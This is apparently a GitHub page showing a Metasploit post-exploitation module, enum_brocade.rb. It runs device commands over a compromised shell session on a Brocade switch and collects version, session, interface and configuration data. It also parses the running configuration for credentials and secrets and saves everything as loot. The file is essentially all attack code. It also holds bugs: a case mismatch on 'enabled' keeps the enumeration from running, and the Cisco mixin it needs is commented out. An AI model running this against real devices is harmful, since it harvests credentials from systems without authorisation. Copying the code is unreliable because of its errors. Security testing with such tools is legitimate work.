-
Notifications
You must be signed in to change notification settings - Fork 8
/
Copy pathenum_brocade.rb
163 lines (147 loc) · 4.69 KB
/
enum_brocade.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
#require 'msf/core/auxiliary/cisco'
class Metasploit3 < Msf::Post
#include Msf::Auxiliary::Cisco
def initialize(info={})
super( update_info( info,
'Name' => 'Brocade Gather Device General Information',
'Description' => %q{
This module collects a Brocade device information and configuration.
},
'License' => MSF_LICENSE,
'Author' => [ 'h00die <mike[at]shorebreaksecurity.com>'],
'SessionTypes' => [ 'shell' ]
))
register_options(
[
OptString.new('ENABLE_UN', [false, 'Enable username for changing privilege level.']),
OptString.new('ENABLE_PASS', [false, 'Enable password for changing privilege level.'])
], self.class)
end
def run
# Get device prompt
prompt = session.shell_command("")
# Set terminal length to 0 so no paging is required
#session.shell_write("term len 0 \n")
# Get version info
print_status("Getting version information")
show_ver_cmd = "show version"
ver_out = session.shell_command(show_ver_cmd)
ver = ver_out.match(/SW: Version (?<ver_no>.*)\n/)
#print_status(ver["ver_no"])
# Get current privilege level
#print_status("Getting privilege level")
#priv_cmd = "show priv"
#priv = (session.shell_command(priv_cmd)).scan(/privilege level is (\d*)/).join
# Mark the OS
os_type = "Brocade"
os_loot = "brocade"
case prompt
when />/
mode = "User Level"
when /#/
mode = "Enabled"
end
print_status("The device OS is #{os_type} version #{ver["ver_no"]}")
#print_status("Session running in mode #{mode}")
print_status("Privilege level #{mode}")
ver_loc = store_loot("brocade.ios.version",
"text/plain",
session,
ver["ver_no"].strip,
"version.txt", #?
"Brocade Version")
# Print the version of VERBOSE set to true.
vprint_status("version information stored in to loot, file:#{ver_loc}")
# Enumerate depending priv level
case mode
when "enabled"
enum_exec(prompt)
enum_priv(prompt)
end
end
# Run enumeration commands for when privilege level is 7 or 15
def enum_priv(prompt)
host,port = session.session_host, session.session_port
priv_commands = [
{
"cmd" => "show running-config",
"fn" => "run_config",
"desc" => "Brocade Device running configuration"
},
# {
# "cmd" => "show cdp neigh",
# "fn" => "cdp_neighbors",
# "desc" => "Cisco Device CDP Neighbors"
# },
{
"cmd" => "show lldp neighbors",
"fn" => "cdp_neighbors",
"desc" => "Brocade Device LLDP Neighbors"
}
]
priv_commands.each do |ec|
cmd_out = session.shell_command(ec['cmd']).gsub(/#{ec['cmd']}|#{prompt}/,"")
next if cmd_out =~ /Invalid input|%/
print_status("Gathering info from #{ec['cmd']}")
# Process configuration
if ec['cmd'] =~/show run/
print_status("Parsing running configuration for credentials and secrets...")
cisco_ios_config_eater(host,port,cmd_out)
end
cmd_loc = store_loot("cisco.ios.#{ec['fn']}",
"text/plain",
session,
cmd_out.strip,
"#{ec['fn']}.txt",
ec['desc'])
vprint_status("Saving to #{cmd_loc}")
end
end
# run commands found in exec mode under privilege 1
def enum_exec(prompt)
exec_commands = [
{
"cmd" => "show ssh",
"fn" => "ssh_sessions",
"desc" => "SSH Sessions on Cisco Device"
},
{
"cmd" => "show sessions",
"fn" => "telnet_sessions",
"desc" => "Telnet Sessions on Cisco Device"
},
{
"cmd" => "show login",
"fn" => "login_settings",
"desc" => "Login settings on Cisco Device"
},
{
"cmd" => "show ip interface brief",
"fn" => "interface_info",
"desc" => "IP Enabled Interfaces on Cisco Device"
},
{
"cmd" => "show inventory",
"fn" => "hw_inventory",
"desc" => "Hardware component inventory for Cisco Device"
}]
exec_commands.each do |ec|
cmd_out = session.shell_command(ec['cmd']).gsub(/#{ec['cmd']}|#{prompt}/,"")
next if cmd_out =~ /Invalid input|%/
print_status("Gathering info from #{ec['cmd']}")
cmd_loc = store_loot("cisco.ios.#{ec['fn']}",
"text/plain",
session,
cmd_out.strip,
"#{ec['fn']}.txt",
ec['desc'])
vprint_status("Saving to #{cmd_loc}")
end
end
end